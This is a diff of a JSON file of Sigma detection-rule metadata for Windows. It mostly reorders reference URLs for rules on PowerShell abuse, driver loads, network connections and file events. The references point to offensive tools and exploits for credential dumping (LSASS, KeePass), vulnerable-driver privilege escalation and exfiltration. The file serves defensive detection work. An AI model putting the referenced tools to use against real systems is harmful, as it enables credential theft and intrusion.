"https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=41", - "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=42", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_x509enrollment.yml" ], "tags": "No established tags" @@ -27843,8 +27843,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.003/T1546.003.md", "https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/data/module_source/persistence/Persistence.psm1#L545", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.003/T1546.003.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_wmi_persistence.yml" ], "tags": [ @@ -27945,8 +27945,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://www.mandiant.com/resources/tactics-techniques-procedures-associated-with-maze-ransomware-incidents", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1083/T1083.md", + "https://www.mandiant.com/resources/tactics-techniques-procedures-associated-with-maze-ransomware-incidents", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_directory_enum.yml" ], "tags": [ @@ -28474,9 +28474,9 @@ "logsource.category": "create_remote_thread", "logsource.product": "windows", "refs": [ - "https://github.com/GhostPack/KeeThief", "https://www.cisa.gov/uscert/ncas/alerts/aa20-259a", "https://github.com/denandz/KeeFarce", + "https://github.com/GhostPack/KeeThief", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_password_dumper_keepass.yml" ], "tags": [ @@ -28509,8 +28509,8 @@ "logsource.category": "create_remote_thread", "logsource.product": "windows", "refs": [ - "https://twitter.com/SBousseaden/status/1090588499517079552", "https://github.com/mdsecactivebreach/CACTUSTORCH", + "https://twitter.com/SBousseaden/status/1090588499517079552", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_cactustorch.yml" ], "tags": [ @@ -28812,11 +28812,11 @@ "logsource.category": "driver_load", "logsource.product": "windows", "refs": [ - "https://www.virustotal.com/gui/file/31f4cfb4c71da44120752721103a16512444c13c2ac2d857a7e6f13cb679b427/details", - "https://github.com/fengjixuchui/gdrv-loader", - "https://twitter.com/malmoeb/status/1551449425842786306", - "https://medium.com/@fsx30/weaponizing-vulnerable-driver-for-privilege-escalation-gigabyte-edition-e73ee523598b", "https://www.virustotal.com/gui/file/cfc5c585dd4e592dd1a08887ded28b92d9a5820587b6f4f8fa4f56d60289259b/details", + "https://github.com/fengjixuchui/gdrv-loader", + "https://www.virustotal.com/gui/file/31f4cfb4c71da44120752721103a16512444c13c2ac2d857a7e6f13cb679b427/details", + "https://medium.com/@fsx30/weaponizing-vulnerable-driver-for-privilege-escalation-gigabyte-edition-e73ee523598b", + "https://twitter.com/malmoeb/status/1551449425842786306", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_win_vuln_gigabyte_driver.yml" ], "tags": [ @@ -28865,18 +28865,18 @@ "logsource.category": "driver_load", "logsource.product": "windows", "refs": [ - "https://github.com/jbaines-r7/dellicious", - "https://www.rapid7.com/blog/post/2021/12/13/driver-based-attacks-past-and-present/", + "https://github.com/stong/CVE-2020-15368", + "https://github.com/CaledoniaProject/drivers-binaries", "https://eclypsium.com/2019/11/12/mother-of-all-drivers/", + "https://github.com/namazso/physmem_drivers", + "https://github.com/Chigusa0w0/AsusDriversPrivEscala", "https://github.com/eclypsium/Screwed-Drivers/blob/master/DRIVERS.md", "https://github.com/MicrosoftDocs/windows-itpro-docs/blob/public/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules.md", - "https://github.com/CaledoniaProject/drivers-binaries", - "https://github.com/stong/CVE-2020-15368", - "https://github.com/Chigusa0w0/AsusDriversPrivEscala", "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-37969", - "https://github.com/namazso/physmem_drivers", "https://www.welivesecurity.com/2022/01/11/signed-kernel-drivers-unguarded-gateway-windows-core/", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-37969", + "https://www.rapid7.com/blog/post/2021/12/13/driver-based-attacks-past-and-present/", + "https://github.com/jbaines-r7/dellicious", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_win_vuln_drivers_names.yml" ], "tags": [ @@ -29011,22 +29011,22 @@ "logsource.category": "driver_load", "logsource.product": "windows", "refs": [ - "https://github.com/jbaines-r7/dellicious", - "https://github.com/tandasat/ExploitCapcom", - "https://github.com/Chigusa0w0/AsusDriversPrivEscala/blob/master/ATSZIO.md", - "https://www.rapid7.com/blog/post/2021/12/13/driver-based-attacks-past-and-present/", + "https://github.com/stong/CVE-2020-15368", + "https://github.com/CaledoniaProject/drivers-binaries", "https://www.unknowncheats.me/forum/downloads.php?do=file&id=25444", + "https://github.com/namazso/physmem_drivers", + "https://github.com/tandasat/ExploitCapcom", + "https://www.unknowncheats.me/forum/downloads.php?do=file&id=21780", + "https://github.com/Chigusa0w0/AsusDriversPrivEscala/blob/master/DRIVER7.md", + "https://www.zscaler.com/blogs/security-research/technical-analysis-windows-clfs-zero-day-vulnerability-cve-2022-37969-part", + "https://github.com/Chigusa0w0/AsusDriversPrivEscala/blob/master/ATSZIO.md", + "https://www.rapid7.com/db/modules/exploit/windows/local/razer_zwopenprocess/", "https://github.com/eclypsium/Screwed-Drivers/blob/master/DRIVERS.md", "https://github.com/MicrosoftDocs/windows-itpro-docs/blob/public/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules.md", - "https://github.com/CaledoniaProject/drivers-binaries", - "https://github.com/stong/CVE-2020-15368", - "https://www.rapid7.com/db/modules/exploit/windows/local/razer_zwopenprocess/", - "https://www.zscaler.com/blogs/security-research/technical-analysis-windows-clfs-zero-day-vulnerability-cve-2022-37969-part", - "https://www.unknowncheats.me/forum/anti-cheat-bypass/334557-vulnerable-driver-megathread.html", "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules", - "https://www.unknowncheats.me/forum/downloads.php?do=file&id=21780", - "https://github.com/namazso/physmem_drivers", - "https://github.com/Chigusa0w0/AsusDriversPrivEscala/blob/master/DRIVER7.md", + "https://www.rapid7.com/blog/post/2021/12/13/driver-based-attacks-past-and-present/", + "https://github.com/jbaines-r7/dellicious", + "https://www.unknowncheats.me/forum/anti-cheat-bypass/334557-vulnerable-driver-megathread.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_win_vuln_drivers.yml" ], "tags": [ @@ -29177,8 +29177,8 @@ "logsource.category": "driver_load", "logsource.product": "windows", "refs": [ - "https://systeminformer.sourceforge.io/", "https://processhacker.sourceforge.io/", + "https://systeminformer.sourceforge.io/", "https://github.com/winsiderss/systeminformer", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_win_process_hacker.yml" ], @@ -29213,8 +29213,8 @@ "logsource.category": "driver_load", "logsource.product": "windows", "refs": [ - "https://www.virustotal.com/gui/file/6a4875ae86131a594019dec4abd46ac6ba47e57a88287b814d07d929858fe3e5/details", "https://decoded.avast.io/janvojtesek/the-return-of-candiru-zero-days-in-the-middle-east/", + "https://www.virustotal.com/gui/file/6a4875ae86131a594019dec4abd46ac6ba47e57a88287b814d07d929858fe3e5/details", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_win_vuln_hw_driver.yml" ], "tags": [ @@ -29238,8 +29238,8 @@ "logsource.category": "driver_load", "logsource.product": "windows", "refs": [ - "https://github.com/alfarom256/CVE-2022-3699/", "https://support.lenovo.com/de/en/product_security/ps500533-lenovo-diagnostics-vulnerabilities", + "https://github.com/alfarom256/CVE-2022-3699/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_win_vuln_lenovo_driver.yml" ], "tags": [ @@ -29308,9 +29308,9 @@ "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ - "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/exfil/Invoke-ExfilDataToGitHub.ps1", - "https://twitter.com/M_haggis/status/1032799638213066752", "https://twitter.com/M_haggis/status/900741347035889665", + "https://twitter.com/M_haggis/status/1032799638213066752", + "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/exfil/Invoke-ExfilDataToGitHub.ps1", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_binary_github_com.yml" ], "tags": [ @@ -29352,8 +29352,8 @@ "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ - "https://pypi.org/project/scapy/", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md#atomic-test-4---port-scan-using-python", + "https://pypi.org/project/scapy/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_python.yml" ], "tags": [ @@ -29404,9 +29404,9 @@ "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ - "https://securelist.com/the-tetrade-brazilian-banking-malware/97779/", "https://blog.bushidotoken.net/2021/04/dead-drop-resolvers-espionage-inspired.html", "https://content.fireeye.com/apt-41/rpt-apt41", + "https://securelist.com/the-tetrade-brazilian-banking-malware/97779/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_dead_drop_resolvers.yml" ], "tags": [ @@ -29503,8 +29503,8 @@ "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ - "https://www.splunk.com/en_us/blog/security/follina-for-protocol-handlers.html", "https://github.com/redcanaryco/atomic-red-team/blob/1cf4dd51f83dcb0ebe6ade902d6157ad2dbc6ac8/atomics/T1218.001/T1218.001.md", + "https://www.splunk.com/en_us/blog/security/follina-for-protocol-handlers.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_hh.yml" ], "tags": [ @@ -29630,8 +29630,8 @@ "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ - "https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/", "https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/", + "https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_regsvr32_network_activity.yml" ], "tags": [ @@ -29890,10 +29890,10 @@ "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ - "https://twitter.com/M_haggis/status/1032799638213066752", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker", - "https://www.cisa.gov/uscert/ncas/alerts/aa22-321a", "https://twitter.com/M_haggis/status/900741347035889665", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker", + "https://twitter.com/M_haggis/status/1032799638213066752", + "https://www.cisa.gov/uscert/ncas/alerts/aa22-321a", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_binary_susp_com.yml" ], "tags": [ @@ -29926,8 +29926,8 @@ "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ - "https://ngrok.com/docs/secure-tunnels/tunnels/ssh-reverse-tunnel-agent", "https://twitter.com/hakluke/status/1587733971814977537/photo/1", + "https://ngrok.com/docs/secure-tunnels/tunnels/ssh-reverse-tunnel-agent", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_ngrok_tunnel.yml" ], "tags": [ @@ -30211,8 +30211,8 @@ "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ - "https://ngrok.com/", "https://www.virustotal.com/gui/file/cca0c1182ac114b44dc52dd2058fcd38611c20bb6b5ad84710681d38212f835a/", + "https://ngrok.com/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_ngrok_io.yml" ], "tags": [ @@ -30245,8 +30245,8 @@ "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-10---windows---powershell-download", "https://lolbas-project.github.io/lolbas/Binaries/IMEWDBLD/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-10---windows---powershell-download", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_imewdbld.yml" ], "tags": [ @@ -30355,8 +30355,8 @@ "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ - "https://twitter.com/forensicitguy/status/1513538712986079238", "https://news.sophos.com/en-us/2019/07/18/a-new-equation-editor-exploit-goes-commercial-as-maldoc-attacks-using-it-spike/", + "https://twitter.com/forensicitguy/status/1513538712986079238", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_eqnedt.yml" ], "tags": [ @@ -30389,8 +30389,8 @@ "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ - "https://app.any.run/tasks/7e906adc-9d11-447f-8641-5f40375ecebb", "https://www.zscaler.com/blogs/security-research/new-espionage-attack-molerats-apt-targeting-users-middle-east", + "https://app.any.run/tasks/7e906adc-9d11-447f-8641-5f40375ecebb", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_dropbox_api.yml" ], "tags": "No established tags" @@ -30411,8 +30411,8 @@ "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ - "https://www.mandiant.com/resources/russian-targeting-gov-business", "https://megatools.megous.com/", + "https://www.mandiant.com/resources/russian-targeting-gov-business", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_mega_nz.yml" ], "tags": [ @@ -30478,8 +30478,8 @@ "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md", "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_msiexec.yml" ], "tags": [ @@ -30512,8 +30512,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://adsecurity.org/?p=2398", "https://stealthbits.com/blog/extracting-password-hashes-from-the-ntds-dit-file/", + "https://adsecurity.org/?p=2398", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_ntds_dit.yml" ], "tags": [ @@ -30554,8 +30554,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://github.com/sailay1996/awesome_windows_logical_bugs/blob/60cbb23a801f4c3195deac1cc46df27c225c3d07/dir_create2system.txt", "https://github.com/binderlabs/DirCreate2System", + "https://github.com/sailay1996/awesome_windows_logical_bugs/blob/60cbb23a801f4c3195deac1cc46df27c225c3d07/dir_create2system.txt", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_system32_local_folder_privilege_escalation.yml" ], "tags": [ @@ -30581,9 +30581,9 @@ "logsource.product": "windows", "refs": [ "https://www.cybereason.com/blog/research/a-bazar-of-tricks-following-team9s-development-cycles", - "https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations", "https://twitter.com/luc4m/status/1073181154126254080", "https://twitter.com/malwrhunterteam/status/1235135745611960321", + "https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations", "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-june-mustang-panda/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_lnk_double_extension.yml" ], @@ -30786,11 +30786,11 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://www.whiteoaksecurity.com/blog/attacks-defenses-dumping-lsass-no-mimikatz/", - "https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/windows/credential_access_lsass_memdump_file_created.toml", - "https://www.google.com/search?q=procdump+lsass", "https://github.com/helpsystems/nanodump", + "https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/windows/credential_access_lsass_memdump_file_created.toml", "https://medium.com/@markmotig/some-ways-to-dump-lsass-exe-c4a75fdc49bf", + "https://www.whiteoaksecurity.com/blog/attacks-defenses-dumping-lsass-no-mimikatz/", + "https://www.google.com/search?q=procdump+lsass", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_lsass_dump.yml" ], "tags": [ @@ -30857,8 +30857,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://github.com/outflanknl/Dumpert", "https://unit42.paloaltonetworks.com/actors-still-exploiting-sharepoint-vulnerability/", + "https://github.com/outflanknl/Dumpert", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_hack_dumpert.yml" ], "tags": [ @@ -30951,9 +30951,9 @@ "logsource.product": "windows", "refs": [ "https://www.cybereason.com/blog/research/a-bazar-of-tricks-following-team9s-development-cycles", - "https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations", "https://twitter.com/luc4m/status/1073181154126254080", "https://twitter.com/malwrhunterteam/status/1235135745611960321", + "https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations", "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-june-mustang-panda/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_double_extension.yml" ], @@ -31286,8 +31286,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://github.com/cube0x0/CVE-2021-1675", "https://github.com/afwu/PrintNightmare", + "https://github.com/cube0x0/CVE-2021-1675", "https://github.com/hhlxf/PrintNightmare", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_cve_2021_1675_printspooler.yml" ], @@ -31638,9 +31638,9 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/", "https://github.com/Kevin-Robertson/Inveigh/blob/29d9e3c3a625b3033cdaf4683efaafadcecb9007/Inveigh/Support/Control.cs", "https://github.com/Kevin-Robertson/Inveigh/blob/29d9e3c3a625b3033cdaf4683efaafadcecb9007/Inveigh/Support/Output.cs", + "https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_inveigh_artefacts.yml" ], "tags": [ @@ -31766,10 +31766,10 @@ "logsource.product": "windows", "refs": [ "https://labs.f-secure.com/blog/prelude-to-ransomware-systembc", - "https://thedfirreport.com/2021/01/18/all-that-for-a-coinminer", "https://news.sophos.com/en-us/2019/12/09/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection/", - "https://assets.documentcloud.org/documents/20444693/fbi-pin-egregor-ransomware-bc-01062021.pdf", + "https://thedfirreport.com/2021/01/18/all-that-for-a-coinminer", "https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html", + "https://assets.documentcloud.org/documents/20444693/fbi-pin-egregor-ransomware-bc-01062021.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_advanced_ip_scanner.yml" ], "tags": [ @@ -31793,8 +31793,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://www.hexacorn.com/blog/2022/01/16/beyond-good-ol-run-key-part-135/", "https://github.com/last-byte/PersistenceSniper", + "https://www.hexacorn.com/blog/2022/01/16/beyond-good-ol-run-key-part-135/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_error_handler_cmd_persistence.yml" ], "tags": [ @@ -31851,21 +31851,21 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1", - "https://github.com/nettitude/Invoke-PowerThIEf", - "https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1", - "https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/", - "https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1", + "https://github.com/samratashok/nishang", "https://github.com/PowerShellMafia/PowerSploit", - "https://github.com/HarmJ0y/DAMP", + "https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1", + "https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries", + "https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1", + "https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/", + "https://github.com/nettitude/Invoke-PowerThIEf", "https://github.com/AlsidOfficial/WSUSpendu/", "https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1", "https://github.com/NetSPI/PowerUpSQL", "https://github.com/CsEnox/EventViewer-UACBypass", "https://github.com/S3cur3Th1sSh1t/WinPwn", + "https://github.com/HarmJ0y/DAMP", + "https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1", "https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/", - "https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries", - "https://github.com/samratashok/nishang", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_powershell_exploit_scripts.yml" ], "tags": [ @@ -31898,8 +31898,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/", "https://en.gteltsc.vn/blog/cap-nhat-nhe-ve-lo-hong-bao-mat-0day-microsoft-exchange-dang-duoc-su-dung-de-tan-cong-cac-to-chuc-tai-viet-nam-9685.html", + "https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/", "https://www.gteltsc.vn/blog/canh-bao-chien-dich-tan-cong-su-dung-lo-hong-zero-day-tren-microsoft-exchange-server-12714.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_exchange_webshell_drop_suspicious.yml" ], @@ -32093,8 +32093,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://persistence-info.github.io/Data/powershellprofile.html", "https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/", + "https://persistence-info.github.io/Data/powershellprofile.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_powershell_profile.yml" ], "tags": [ @@ -32359,8 +32359,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://github.com/OTRF/detection-hackathon-apt29/issues/14", "https://threathunterplaybook.com/evals/apt29/detections/6.B.1_6392C9F1-D975-4F75-8A70-433DEDD7F622.html", + "https://github.com/OTRF/detection-hackathon-apt29/issues/14", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_pfx_file_creation.yml" ], "tags": [ @@ -32394,8 +32394,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://www.zerodayinitiative.com/advisories/ZDI-21-1308/", "https://github.com/klinix5/InstallerFileTakeOver", + "https://www.zerodayinitiative.com/advisories/ZDI-21-1308/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_cve_2021_41379_msi_lpe.yml" ], "tags": [ @@ -32452,10 +32452,10 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://bohops.com/2021/03/16/investigating-net-clr-usage-log-tampering-techniques-for-edr-evasion/", - "https://web.archive.org/web/20221026202428/https://gist.github.com/code-scrap/d7f152ffcdb3e0b02f7f394f5187f008", - "https://blog.menasec.net/2019/07/interesting-difr-traces-of-net-clr.html", "https://github.com/olafhartong/sysmon-modular/blob/fa1ae53132403d262be2bbd7f17ceea7e15e8c78/11_file_create/include_dotnet.xml", + "https://web.archive.org/web/20221026202428/https://gist.github.com/code-scrap/d7f152ffcdb3e0b02f7f394f5187f008", + "https://bohops.com/2021/03/16/investigating-net-clr-usage-log-tampering-techniques-for-edr-evasion/", + "https://blog.menasec.net/2019/07/interesting-difr-traces-of-net-clr.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_net_cli_artefact.yml" ], "tags": [ @@ -32488,9 +32488,9 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Eventvwr/#execute", "https://twitter.com/orange_8361/status/1518970259868626944?s=20&t=RFXqZjtA7tWM3HxqEH78Aw", "https://twitter.com/splinter_code/status/1519075134296006662?s=12&t=DLUXH86WtcmG_AZ5gY3C6g", - "https://lolbas-project.github.io/lolbas/Binaries/Eventvwr/#execute", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_uac_bypass_eventvwr.yml" ], "tags": [ @@ -32514,8 +32514,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/", "https://en.gteltsc.vn/blog/cap-nhat-nhe-ve-lo-hong-bao-mat-0day-microsoft-exchange-dang-duoc-su-dung-de-tan-cong-cac-to-chuc-tai-viet-nam-9685.html", + "https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/", "https://www.gteltsc.vn/blog/canh-bao-chien-dich-tan-cong-su-dung-lo-hong-zero-day-tren-microsoft-exchange-server-12714.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_exchange_webshell_drop.yml" ], @@ -32538,8 +32538,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://www.first.org/resources/papers/conf2017/Advanced-Incident-Detection-and-Threat-Hunting-using-Sysmon-and-Splunk.pdf", "https://www.hybrid-analysis.com/sample/ba86fa0d4b6af2db0656a88b1dd29f36fe362473ae8ad04255c4e52f214a541c?environmentId=100", + "https://www.first.org/resources/papers/conf2017/Advanced-Incident-Detection-and-Threat-Hunting-using-Sysmon-and-Splunk.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_mal_adwind.yml" ], "tags": [ @@ -32613,8 +32613,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://github.com/deepinstinct/Lsass-Shtinkering", "https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Asaf%20Gilboa%20-%20LSASS%20Shtinkering%20Abusing%20Windows%20Error%20Reporting%20to%20Dump%20LSASS.pdf", + "https://github.com/deepinstinct/Lsass-Shtinkering", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_lsass_shtinkering.yml" ], "tags": [ @@ -32647,8 +32647,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py", "https://github.com/Porchetta-Industries/CrackMapExec", + "https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_remote_cred_dump.yml" ], "tags": [ @@ -32747,8 +32747,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1566.001/T1566.001.md", "https://docs.microsoft.com/en-us/deployoffice/compat/office-file-format-reference", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1566.001/T1566.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_macro_file.yml" ], "tags": [ @@ -32806,8 +32806,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/36d49de4c8b00bf36054294b4a1fcbab3917d7c5/atomics/T1547.001/T1547.001.md#atomic-test-7---add-executable-shortcut-link-to-user-startup-folder", "https://redcanary.com/blog/intelligence-insights-october-2021/", + 